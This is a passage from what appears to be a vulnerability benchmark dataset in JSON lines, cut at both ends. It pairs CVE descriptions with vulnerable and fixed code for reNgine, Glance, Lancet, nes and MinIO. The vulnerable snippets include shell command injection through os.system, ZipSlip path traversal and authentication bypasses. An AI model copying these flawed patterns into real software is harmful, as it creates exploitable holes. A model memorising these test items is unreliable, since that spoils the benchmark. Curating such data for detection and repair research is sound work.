token, credentials will not be generated\", iamPolicyClaimNameOpenID()))\n+\t}\n+\tm[iamPolicyClaimNameOpenID()] = policyName\n+\n+\tsecret := globalActiveCred.SecretKey\n+\tcred, err := auth.GetNewCredentialsWithMetadata(m, secret)\n \tif err != nil {\n \t\treturn toJSONError(ctx, err)\n \t}\n-\tdefer xhttp.DrainBody(resp.Body)\n \n-\tif resp.StatusCode != http.StatusOK {\n-\t\treturn toJSONError(ctx, errors.New(resp.Status))\n-\t}\n-\n-\ta := AssumeRoleWithWebIdentityResponse{}\n-\tif err = xml.NewDecoder(resp.Body).Decode(&a); err != nil {\n+\t// Set the newly generated credentials.\n+\tif err = globalIAMSys.SetTempUser(cred.AccessKey, cred, policyName); err != nil {\n \t\treturn toJSONError(ctx, err)\n \t}\n \n-\treply.Token = a.Result.Credentials.SessionToken\n+\t// Notify all other MinIO peers to reload temp users\n+\tfor _, nerr := range globalNotificationSys.LoadUser(cred.AccessKey, true) {\n+\t\tif nerr.Err != nil {\n+\t\t\tlogger.GetReqInfo(ctx).SetTags(\"peerAddress\", nerr.Host.String())\n+\t\t\tlogger.LogIf(ctx, nerr.Err)\n+\t\t}\n+\t}\n+\n+\treply.Token = cred.SessionToken\n \treply.UIVersion = browser.UIVersion\n \treturn nil\n }\n\n--- /dev/null\n+++ b/cmd/web-handlers.go\n@@ -0,0 +1 @@\n+var errSTSNotInitialized = errors.New(\"STS API not initialized, please configure STS support\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1813", "cve_description": "OS Command Injection in GitHub repository yogeshojha/rengine prior to 1.2.0.", "cwe_info": {"CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/yogeshojha/rengine", "patch_url": ["https://github.com/yogeshojha/rengine/commit/8277cec0f008a0451371a92e7e0bf082ab3f0c34"], "programing_language": "Python", "vul_func": [{"id": "vul_py_116_1", "commit": "72a5fb2", "file_path": "web/reNgine/common_func.py", "start_line": 668, "end_line": 709, "snippet": "def get_cms_details(url):\n # this function will fetch cms details using cms_detector\n response = {}\n cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)\n os.system(cms_detector_command)\n\n response['status'] = False\n response['message'] = 'Could not detect CMS!'\n\n parsed_url = urlparse(url)\n\n domain_name = parsed_url.hostname\n port = parsed_url.port\n\n find_dir = domain_name\n\n if port:\n find_dir += '_{}'.format(port)\n\n\n print(url)\n print(find_dir)\n\n # subdomain may also have port number, and is stored in dir as _port\n\n cms_dir_path = '/usr/src/github/CMSeeK/Result/{}'.format(find_dir)\n cms_json_path = cms_dir_path + '/cms.json'\n\n if os.path.isfile(cms_json_path):\n cms_file_content = json.loads(open(cms_json_path, 'r').read())\n if not cms_file_content.get('cms_id'):\n return response\n response = {}\n response = cms_file_content\n response['status'] = True\n # remove cms dir path\n try:\n shutil.rmtree(cms_dir_path)\n except Exception as e:\n print(e)\n\n return response"}], "fix_func": [{"id": "fix_py_116_1", "commit": "8277cec", "file_path": "web/reNgine/common_func.py", "start_line": 669, "end_line": 714, "snippet": "def get_cms_details(url):\n # this function will fetch cms details using cms_detector\n response = {}\n cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py --random-agent --batch --follow-redirect'\n subprocess_splitted_command = cms_detector_command.split()\n subprocess_splitted_command.append('-u')\n subprocess_splitted_command.append(url)\n process = subprocess.Popen(subprocess_splitted_command)\n process.wait()\n\n response['status'] = False\n response['message'] = 'Could not detect CMS!'\n\n parsed_url = urlparse(url)\n\n domain_name = parsed_url.hostname\n port = parsed_url.port\n\n find_dir = domain_name\n\n if port:\n find_dir += '_{}'.format(port)\n\n\n print(url)\n print(find_dir)\n\n # subdomain may also have port number, and is stored in dir as _port\n\n cms_dir_path = '/usr/src/github/CMSeeK/Result/{}'.format(find_dir)\n cms_json_path = cms_dir_path + '/cms.json'\n\n if os.path.isfile(cms_json_path):\n cms_file_content = json.loads(open(cms_json_path, 'r').read())\n if not cms_file_content.get('cms_id'):\n return response\n response = {}\n response = cms_file_content\n response['status'] = True\n # remove cms dir path\n try:\n shutil.rmtree(cms_dir_path)\n except Exception as e:\n print(e)\n\n return response"}], "vul_patch": "--- a/web/reNgine/common_func.py\n+++ b/web/reNgine/common_func.py\n@@ -1,8 +1,12 @@\n def get_cms_details(url):\n # this function will fetch cms details using cms_detector\n response = {}\n- cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)\n- os.system(cms_detector_command)\n+ cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py --random-agent --batch --follow-redirect'\n+ subprocess_splitted_command = cms_detector_command.split()\n+ subprocess_splitted_command.append('-u')\n+ subprocess_splitted_command.append(url)\n+ process = subprocess.Popen(subprocess_splitted_command)\n+ process.wait()\n \n response['status'] = False\n response['message'] = 'Could not detect CMS!'\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-7200", "cve_description": "An SSRF issue was discovered in OpenStack Glance before Newton. The 'copy_from' feature in the Image Service API v1 allowed an attacker to perform masked network port scans. With v1, it is possible to create images with a URL such as 'http://localhost:22'. This could then allow an attacker to enumerate internal network details while appearing masked, since the scan would appear to originate from the Glance Image service.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/openstack/glance", "patch_url": ["https://github.com/openstack/glance/commit/b1ac90f7914d91b25144cc4063fa994fb5019ee3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_272_1", "commit": "cc6ce4a", "file_path": "glance/api/v1/images.py", "start_line": 640, "end_line": 700, "snippet": " def create(self, req, image_meta, image_data):\n \"\"\"\n Adds a new image to Glance. Four scenarios exist when creating an\n image:\n\n 1. If the image data is available directly for upload, create can be\n passed the image data as the request body and the metadata as the\n request headers. The image will initially be 'queued', during\n upload it will be in the 'saving' status, and then 'killed' or\n 'active' depending on whether the upload completed successfully.\n\n 2. If the image data exists somewhere else, you can upload indirectly\n from the external source using the x-glance-api-copy-from header.\n Once the image is uploaded, the external store is not subsequently\n consulted, i.e. the image content is served out from the configured\n glance image store. State transitions are as for option #1.\n\n 3. If the image data exists somewhere else, you can reference the\n source using the x-image-meta-location header. The image content\n will be served out from the external store, i.e. is never uploaded\n to the configured glance image store.\n\n 4. If the image data is not available yet, but you'd like reserve a\n spot for it, you can omit the data and a record will be created in\n the 'queued' state. This exists primarily to maintain backwards\n compatibility with OpenStack/Rackspace API semantics.\n\n The request body *must* be encoded as application/octet-stream,\n otherwise an HTTPBadRequest is returned.\n\n Upon a successful save of the image data and metadata, a response\n containing metadata about the image is returned, including its\n opaque identifier.\n\n :param req: The WSGI/Webob Request object\n :param image_meta: Mapping of metadata about image\n :param image_data: Actual image data that is to be stored\n\n :raises HTTPBadRequest if x-image-meta-location is missing\n and the request body is not application/octet-stream\n image data.\n \"\"\"\n self._enforce(req, 'add_image')\n is_public = image_meta.get('is_public')\n if is_public:\n self._enforce(req, 'publicize_image')\n\n image_meta = self._reserve(req, image_meta)\n id = image_meta['id']\n\n image_meta = self._handle_source(req, id, image_meta, image_data)\n\n location_uri = image_meta.get('location')\n if location_uri:\n self.update_store_acls(req, id, location_uri, public=is_public)\n\n # Prevent client from learning the location, as it\n # could contain security credentials\n image_meta.pop('location', None)\n\n return {'image_meta': image_meta}"}], "fix_func": [{"id": "fix_py_272_1", "commit": "b1ac90f7914d91b25144cc4063fa994fb5019ee3", "file_path": "glance/api/v1/images.py", "start_line": 640, "end_line": 702, "snippet": " def create(self, req, image_meta, image_data):\n \"\"\"\n Adds a new image to Glance. Four scenarios exist when creating an\n image:\n\n 1. If the image data is available directly for upload, create can be\n passed the image data as the request body and the metadata as the\n request headers. The image will initially be 'queued', during\n upload it will be in the 'saving' status, and then 'killed' or\n 'active' depending on whether the upload completed successfully.\n\n 2. If the image data exists somewhere else, you can upload indirectly\n from the external source using the x-glance-api-copy-from header.\n Once the image is uploaded, the external store is not subsequently\n consulted, i.e. the image content is served out from the configured\n glance image store. State transitions are as for option #1.\n\n 3. If the image data exists somewhere else, you can reference the\n source using the x-image-meta-location header. The image content\n will be served out from the external store, i.e. is never uploaded\n to the configured glance image store.\n\n 4. If the image data is not available yet, but you'd like reserve a\n spot for it, you can omit the data and a record will be created in\n the 'queued' state. This exists primarily to maintain backwards\n compatibility with OpenStack/Rackspace API semantics.\n\n The request body *must* be encoded as application/octet-stream,\n otherwise an HTTPBadRequest is returned.\n\n Upon a successful save of the image data and metadata, a response\n containing metadata about the image is returned, including its\n opaque identifier.\n\n :param req: The WSGI/Webob Request object\n :param image_meta: Mapping of metadata about image\n :param image_data: Actual image data that is to be stored\n\n :raises HTTPBadRequest if x-image-meta-location is missing\n and the request body is not application/octet-stream\n image data.\n \"\"\"\n self._enforce(req, 'add_image')\n is_public = image_meta.get('is_public')\n if is_public:\n self._enforce(req, 'publicize_image')\n if Controller._copy_from(req):\n self._enforce(req, 'copy_from')\n\n image_meta = self._reserve(req, image_meta)\n id = image_meta['id']\n\n image_meta = self._handle_source(req, id, image_meta, image_data)\n\n location_uri = image_meta.get('location')\n if location_uri:\n self.update_store_acls(req, id, location_uri, public=is_public)\n\n # Prevent client from learning the location, as it\n # could contain security credentials\n image_meta.pop('location', None)\n\n return {'image_meta': image_meta}"}], "vul_patch": "--- a/glance/api/v1/images.py\n+++ b/glance/api/v1/images.py\n@@ -44,6 +44,8 @@\n is_public = image_meta.get('is_public')\n if is_public:\n self._enforce(req, 'publicize_image')\n+ if Controller._copy_from(req):\n+ self._enforce(req, 'copy_from')\n \n image_meta = self._reserve(req, image_meta)\n id = image_meta['id']\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-41920", "cve_description": "Lancet is a general utility library for the go programming language. Affected versions are subject to a ZipSlip issue when using the fileutil package to unzip files. This issue has been addressed and a fix will be included in versions 2.1.10 and 1.3.4. Users are advised to upgrade. There are no known workarounds for this issue.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/duke-git/lancet", "patch_url": ["https://github.com/duke-git/lancet/commit/f869a0a67098e92d24ddd913e188b32404fa72c9", "https://github.com/duke-git/lancet/commit/f133b32faa05eb93e66175d01827afa4b7094572"], "programing_language": "Go", "vul_func": [{"id": "vul_go_226_1", "commit": "be000a4", "file_path": "fileutil/file.go", "start_line": "216", "end_line": "259", "snippet": "func UnZip(zipFile string, destPath string) error {\n\tdestPath = filepath.Clean(destPath) + string(os.PathSeparator)\n\n\tzipReader, err := zip.OpenReader(zipFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer zipReader.Close()\n\n\tfor _, f := range zipReader.File {\n\t\tpath := filepath.Join(destPath, f.Name)\n\n\t\t//issue#62: fix ZipSlip bug\n\t\tif !strings.HasPrefix(path, destPath) {\n\t\t\treturn fmt.Errorf(\"%s: illegal file path\", path)\n\t\t}\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, os.ModePerm)\n\t\t} else {\n\t\t\tif err = os.MkdirAll(filepath.Dir(path), os.ModePerm); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tinFile, err := f.Open()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer inFile.Close()\n\n\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer outFile.Close()\n\n\t\t\t_, err = io.Copy(outFile, inFile)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_226_1", "commit": "f869a0a", "file_path": "fileutil/file.go", "start_line": "216", "end_line": "259", "snippet": "func UnZip(zipFile string, destPath string) error {\n\n\tzipReader, err := zip.OpenReader(zipFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer zipReader.Close()\n\n\tfor _, f := range zipReader.File {\n\t\tpath := filepath.Join(destPath, f.Name)\n\n\t\t//issue#62: fix ZipSlip bug\n\t\tpath, err := safeFilepathJoin(destPath, f.Name)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, os.ModePerm)\n\t\t} else {\n\t\t\tif err = os.MkdirAll(filepath.Dir(path), os.ModePerm); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tinFile, err := f.Open()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer inFile.Close()\n\n\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer outFile.Close()\n\n\t\t\t_, err = io.Copy(outFile, inFile)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "fix_go_226_2", "commit": "f869a0a", "file_path": "fileutil/file.go", "start_line": "261", "end_line": "270", "snippet": "func safeFilepathJoin(path1, path2 string) (string, error) {\n\trelPath, err := filepath.Rel(\".\", path2)\n\tif err != nil || strings.HasPrefix(relPath, \"..\") {\n\t\treturn \"\", fmt.Errorf(\"(zipslip) filepath is unsafe %q: %v\", path2, err)\n\t}\n\tif path1 == \"\" {\n\t\tpath1 = \".\"\n\t}\n\treturn filepath.Join(path1, filepath.Join(\"/\", relPath)), nil\n}"}], "vul_patch": "--- a/fileutil/file.go\n+++ b/fileutil/file.go\n@@ -1,5 +1,4 @@\n func UnZip(zipFile string, destPath string) error {\n-\tdestPath = filepath.Clean(destPath) + string(os.PathSeparator)\n \n \tzipReader, err := zip.OpenReader(zipFile)\n \tif err != nil {\n@@ -11,8 +10,9 @@\n \t\tpath := filepath.Join(destPath, f.Name)\n \n \t\t//issue#62: fix ZipSlip bug\n-\t\tif !strings.HasPrefix(path, destPath) {\n-\t\t\treturn fmt.Errorf(\"%s: illegal file path\", path)\n+\t\tpath, err := safeFilepathJoin(destPath, f.Name)\n+\t\tif err != nil {\n+\t\t\treturn err\n \t\t}\n \n \t\tif f.FileInfo().IsDir() {\n\n--- /dev/null\n+++ b/fileutil/file.go\n@@ -0,0 +1,10 @@\n+func safeFilepathJoin(path1, path2 string) (string, error) {\n+\trelPath, err := filepath.Rel(\".\", path2)\n+\tif err != nil || strings.HasPrefix(relPath, \"..\") {\n+\t\treturn \"\", fmt.Errorf(\"(zipslip) filepath is unsafe %q: %v\", path2, err)\n+\t}\n+\tif path1 == \"\" {\n+\t\tpath1 = \".\"\n+\t}\n+\treturn filepath.Join(path1, filepath.Join(\"/\", relPath)), nil\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-16025", "cve_description": "Nes is a websocket extension library for hapi. Hapi is a webserver framework. Versions below and including 6.4.0 have a denial of service vulnerability via an invalid Cookie header. This is only present when websocket authentication is set to `cookie`. Submitting an invalid cookie on the websocket upgrade request will cause the node process to error out.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/hapijs/nes", "patch_url": ["https://github.com/hapijs/nes/commit/249ba1755ed6977fbc208463c87364bf884ad655"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_59_1", "commit": "71e9232", "file_path": "lib/socket.js", "start_line": 524, "end_line": 547, "snippet": "internals.Socket.prototype._authenticate = function () {\n\n const config = this._listener._settings.auth;\n if (!config) {\n return;\n }\n\n if (config.timeout) {\n this.auth._timeout = setTimeout(() => this.disconnect(), config.timeout);\n }\n\n const cookies = this._ws.upgradeReq.headers.cookie;\n if (!cookies) {\n return;\n }\n\n this._listener._connection.states.parse(cookies, (ignoreErr, state, failed) => {\n\n const auth = state[config.cookie];\n if (auth) {\n this.auth._error = this._setCredentials(auth.credentials, auth.artifacts);\n }\n });\n};"}], "fix_func": [{"id": "fix_js_59_1", "commit": "249ba1755ed6977fbc208463c87364bf884ad655", "file_path": "lib/socket.js", "start_line": 524, "end_line": 562, "snippet": "internals.Socket.prototype._authenticate = function () {\n\n const config = this._listener._settings.auth;\n if (!config) {\n return;\n }\n\n if (config.timeout) {\n this.auth._timeout = setTimeout(() => this.disconnect(), config.timeout);\n }\n\n const cookies = this._ws.upgradeReq.headers.cookie;\n if (!cookies) {\n return;\n }\n\n this._listener._connection.states.parse(cookies, (err, state, failed) => {\n\n if (err) {\n this.auth._error = Boom.unauthorized('Invalid nes authentication cookie');\n return;\n }\n\n const auth = state[config.cookie];\n if (auth) {\n this.auth._error = this._setCredentials(auth.credentials, auth.artifacts);\n }\n });\n};\n\n\ninternals.Socket.prototype._setCredentials = function (credentials, artifacts) {\n\n this.auth.isAuthenticated = true;\n this.auth.credentials = credentials;\n this.auth.artifacts = artifacts;\n\n return this._listener._sockets.auth(this);\n};"}], "vul_patch": "--- a/lib/socket.js\n+++ b/lib/socket.js\n@@ -14,7 +14,12 @@\n return;\n }\n \n- this._listener._connection.states.parse(cookies, (ignoreErr, state, failed) => {\n+ this._listener._connection.states.parse(cookies, (err, state, failed) => {\n+\n+ if (err) {\n+ this.auth._error = Boom.unauthorized('Invalid nes authentication cookie');\n+ return;\n+ }\n \n const auth = state[config.cookie];\n if (auth) {\n@@ -22,3 +27,13 @@\n }\n });\n };\n+\n+\n+internals.Socket.prototype._setCredentials = function (credentials, artifacts) {\n+\n+ this.auth.isAuthenticated = true;\n+ this.auth.credentials = credentials;\n+ this.auth.artifacts = artifacts;\n+\n+ return this._listener._sockets.auth(this);\n+};\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2017-16025:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/nes\n\nGLOBAL_EXCLUDE=\"AggregateError,Atomics,BigUint64Array,BigInt64Array,BigInt,FinalizationRegistry,WeakRef,URL,URLSearchParams,DOMException,AbortController,AbortSignal,Event,EventTarget,TextEncoder,TextDecoder,TransformStream,TransformStreamDefaultController,WritableStream,WritableStreamDefaultController,WritableStreamDefaultWriter,ReadableStream,ReadableStreamDefaultReader,ReadableStreamBYOBReader,ReadableStreamBYOBRequest,ReadableByteStreamController,ReadableStreamDefaultController,ByteLengthQueuingStrategy,CountQueuingStrategy,TextEncoderStream,TextDecoderStream,CompressionStream,DecompressionStream,queueMicrotask,structuredClone,atob,btoa,BroadcastChannel,MessageChannel,MessagePort,Blob,File,Performance,PerformanceEntry,PerformanceMark,PerformanceMeasure,PerformanceObserver,PerformanceObserverEntryList,PerformanceResourceTiming,performance,fetch,FormData,Headers,Request,Response,MessageEvent,WebSocket,Iterator,SharedArrayBuffer,Navigator,navigator,crypto,CryptoKey,SubtleCrypto,CustomEvent,Crypto\"\n\nexport NODE_NO_WARNINGS=1\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode node_modules/lab/bin/lab \\\n -a code \\\n --globals $GLOBAL_EXCLUDE \\\n -g \"errors on invalid cookie\" \\\n test/auth.js\n\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2017-16025:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/nes\n\nGLOBAL_EXCLUDE=\"AggregateError,Atomics,BigUint64Array,BigInt64Array,BigInt,FinalizationRegistry,WeakRef,URL,URLSearchParams,DOMException,AbortController,AbortSignal,Event,EventTarget,TextEncoder,TextDecoder,TransformStream,TransformStreamDefaultController,WritableStream,WritableStreamDefaultController,WritableStreamDefaultWriter,ReadableStream,ReadableStreamDefaultReader,ReadableStreamBYOBReader,ReadableStreamBYOBRequest,ReadableByteStreamController,ReadableStreamDefaultController,ByteLengthQueuingStrategy,CountQueuingStrategy,TextEncoderStream,TextDecoderStream,CompressionStream,DecompressionStream,queueMicrotask,structuredClone,atob,btoa,BroadcastChannel,MessageChannel,MessagePort,Blob,File,Performance,PerformanceEntry,PerformanceMark,PerformanceMeasure,PerformanceObserver,PerformanceObserverEntryList,PerformanceResourceTiming,performance,fetch,FormData,Headers,Request,Response,MessageEvent,WebSocket,Iterator,SharedArrayBuffer,Navigator,navigator,crypto,CryptoKey,SubtleCrypto,CustomEvent,Crypto\"\n\nexport NODE_NO_WARNINGS=1\n\nnode node_modules/lab/bin/lab \\\n -a code \\\n --globals $GLOBAL_EXCLUDE \\\n test/index.js test/auth.js test/listener.js test/socket.js\n\n"} {"cve_id": "CVE-2025-27414", "cve_description": "MinIO is a high performance object storage. Starting in RELEASE.2024-06-06T09-36-42Z and prior to \nRELEASE.2025-02-28T09-55-16Z, a bug in evaluating the trust of the SSH key used in an SFTP connection to MinIO allows authentication bypass and unauthorized data access. On a MinIO server with SFTP access configured and using LDAP as an external identity provider, MinIO supports SSH key based authentication for SFTP connections when the user has the `sshPublicKey` attribute set in their LDAP server. The server trusts the client's key only when the public key is the same as the `sshPublicKey` attribute. Due to the bug, when the user has no `sshPublicKey` property in LDAP, the server ends up trusting the key allowing the client to perform any FTP operations allowed by the MinIO access policies associated with the LDAP user (or any of their groups). Three requirements must be met in order to exploit the vulnerability. First, the MinIO server must be configured to allow SFTP access and use LDAP as an external identity provider. Second, the attacker must have knowledge of an LDAP username that does not have the `sshPublicKey` property set. Third, such an LDAP username or one of their groups must also have some MinIO access policy configured. When this bug is successfully exploited, the attacker can perform any FTP operations (i.e. reading, writing, deleting and listing objects) allowed by the access policy associated with the LDAP user account (and their groups). Version 1.2.0 fixes the issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec"], "programing_language": "Go", "vul_func": [{"id": "vul_go_239_1", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 65, "end_line": 65, "snippet": "var caPublicKey ssh.PublicKey"}, {"id": "vul_go_239_2", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 137, "end_line": 191, "snippet": "func authenticateSSHConnection(c ssh.ConnMetadata, key ssh.PublicKey, pass []byte) (*ssh.Permissions, error) {\n\tuser, found := strings.CutSuffix(c.User(), \"=ldap\")\n\tif found {\n\t\tif !globalIAMSys.LDAPConfig.Enabled() {\n\t\t\treturn nil, errSFTPLDAPNotEnabled\n\t\t}\n\t\treturn processLDAPAuthentication(key, pass, user)\n\t}\n\n\tuser, found = strings.CutSuffix(c.User(), \"=svc\")\n\tif found {\n\t\tgoto internalAuth\n\t}\n\n\tif globalIAMSys.LDAPConfig.Enabled() {\n\t\tperms, _ := processLDAPAuthentication(key, pass, user)\n\t\tif perms != nil {\n\t\t\treturn perms, nil\n\t\t}\n\t}\n\ninternalAuth:\n\tui, ok := globalIAMSys.GetUser(context.Background(), user)\n\tif !ok {\n\t\treturn nil, errNoSuchUser\n\t}\n\n\tif caPublicKey != nil && pass == nil {\n\t\terr := validateKey(c, key)\n\t\tif err != nil {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t} else {\n\t\t// Temporary credentials are not allowed.\n\t\tif ui.Credentials.IsTemp() {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t\tif subtle.ConstantTimeCompare([]byte(ui.Credentials.SecretKey), pass) != 1 {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t}\n\n\tcopts := map[string]string{\n\t\t\"AccessKey\": ui.Credentials.AccessKey,\n\t\t\"SecretKey\": ui.Credentials.SecretKey,\n\t}\n\tif ui.Credentials.IsTemp() {\n\t\tcopts[\"SessionToken\"] = ui.Credentials.SessionToken\n\t}\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: copts,\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "vul_go_239_3", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 193, "end_line": 311, "snippet": "func processLDAPAuthentication(key ssh.PublicKey, pass []byte, user string) (perms *ssh.Permissions, err error) {\n\tvar lookupResult *xldap.DNSearchResult\n\tvar targetGroups []string\n\n\tif pass == nil && key == nil {\n\t\treturn nil, errAuthentication\n\t}\n\n\tif pass != nil {\n\t\tsa, _, err := globalIAMSys.getServiceAccount(context.Background(), user)\n\t\tif err == nil {\n\t\t\tif subtle.ConstantTimeCompare([]byte(sa.Credentials.SecretKey), pass) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\n\t\t\treturn &ssh.Permissions{\n\t\t\t\tCriticalOptions: map[string]string{\n\t\t\t\t\t\"AccessKey\": sa.Credentials.AccessKey,\n\t\t\t\t\t\"SecretKey\": sa.Credentials.SecretKey,\n\t\t\t\t},\n\t\t\t\tExtensions: make(map[string]string),\n\t\t\t}, nil\n\t\t}\n\n\t\tif !errors.Is(err, errNoSuchServiceAccount) {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.Bind(user, string(pass))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t} else if key != nil {\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.LookupUserDN(user)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif lookupResult == nil {\n\t\treturn nil, errNoSuchUser\n\t}\n\n\tldapPolicies, _ := globalIAMSys.PolicyDBGet(lookupResult.NormDN, targetGroups...)\n\tif len(ldapPolicies) == 0 {\n\t\treturn nil, errSFTPUserHasNoPolicies\n\t}\n\n\tclaims := make(map[string]interface{})\n\tfor attribKey, attribValue := range lookupResult.Attributes {\n\t\t// we skip multi-value attributes here, as they cannot\n\t\t// be stored in the critical options.\n\t\tif len(attribValue) != 1 {\n\t\t\tcontinue\n\t\t}\n\n\t\tif attribKey == \"sshPublicKey\" && key != nil {\n\t\t\tkey2, _, _, _, err := ssh.ParseAuthorizedKey([]byte(attribValue[0]))\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errSFTPPublicKeyBadFormat\n\t\t\t}\n\n\t\t\tif subtle.ConstantTimeCompare(key2.Marshal(), key.Marshal()) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\t\t}\n\t\tclaims[ldapAttribPrefix+attribKey] = attribValue[0]\n\t}\n\n\texpiryDur, err := globalIAMSys.LDAPConfig.GetExpiryDuration(\"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclaims[expClaim] = UTCNow().Add(expiryDur).Unix()\n\tclaims[ldapUserN] = user\n\tclaims[ldapUser] = lookupResult.NormDN\n\n\tcred, err := auth.GetNewCredentialsWithMetadata(claims, globalActiveCred.SecretKey)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Set the parent of the temporary access key, this is useful\n\t// in obtaining service accounts by this cred.\n\tcred.ParentUser = lookupResult.NormDN\n\n\t// Set this value to LDAP groups, LDAP user can be part\n\t// of large number of groups\n\tcred.Groups = targetGroups\n\n\t// Set the newly generated credentials, policyName is empty on purpose\n\t// LDAP policies are applied automatically using their ldapUser, ldapGroups\n\t// mapping.\n\tupdatedAt, err := globalIAMSys.SetTempUser(context.Background(), cred.AccessKey, cred, \"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treplLogIf(context.Background(), globalSiteReplicationSys.IAMChangeHook(context.Background(), madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemSTSAcc,\n\t\tSTSCredential: &madmin.SRSTSCredential{\n\t\t\tAccessKey: cred.AccessKey,\n\t\t\tSecretKey: cred.SecretKey,\n\t\t\tSessionToken: cred.SessionToken,\n\t\t\tParentUser: cred.ParentUser,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: map[string]string{\n\t\t\t\"AccessKey\": cred.AccessKey,\n\t\t\t\"SecretKey\": cred.SecretKey,\n\t\t\t\"SessionToken\": cred.SessionToken,\n\t\t},\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "vul_go_239_4", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 313, "end_line": 339, "snippet": "func validateKey(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n\tif caPublicKey == nil {\n\t\treturn errors.New(\"public key authority validation requested but no ca public key specified.\")\n\t}\n\n\tcert, ok := clientKey.(*ssh.Certificate)\n\tif !ok {\n\t\treturn errSftpPublicKeyWithoutCert\n\t}\n\n\t// ssh.CheckCert called by ssh.Authenticate accepts certificates\n\t// with empty principles list so we block those in here.\n\tif len(cert.ValidPrincipals) == 0 {\n\t\treturn errSftpCertWithoutPrincipals\n\t}\n\n\t// Verify that certificate provided by user is issued by trusted CA,\n\t// username in authentication request matches to identities in certificate\n\t// and that certificate type is correct.\n\tchecker := 